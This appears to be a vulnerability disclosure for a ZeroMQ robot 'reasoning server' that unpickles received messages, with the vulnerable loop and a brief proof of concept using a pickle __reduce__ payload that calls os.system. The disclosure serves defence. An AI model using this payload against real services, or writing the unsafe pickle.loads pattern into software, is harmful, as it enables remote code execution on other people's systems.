### Key Information #### Vulnerability Type - **Remote Code Execution (RCE) Vulnerability** #### Affected Code - `experiments.robot.bridge.reasoning_server::run_reasoning_server` #### Vulnerability Description - The server receives messages via ZeroMQ and deserializes them using `pickle.loads()`. - The deserialization process contains an unsafe call to `pickle.loads()`, allowing attackers to execute arbitrary code. #### Vulnerable Code Snippet ```python while True: message = socket.recv() inputs = pickle.loads(message) # Unsafe deserialization result = model.raw_generate(inputs) socket.send(pickle.dumps(result)) ``` #### Proof of Concept (PoC) 1. Start the vulnerable server: ```bash PYTHONPATH=. python3 experiments/robot/bridge/reasoning_server.py ``` 2. Run client code to send malicious payload: ```python import pickle, zmq class Payload(object): def __reduce__(self): import os return (os.system, ('echo "hacked"',)) ``` #### Summary - The vulnerability exists in the `run_reasoning_server` function due to the unsafe use of `pickle.loads()` for deserialization, leading to a risk of remote code execution.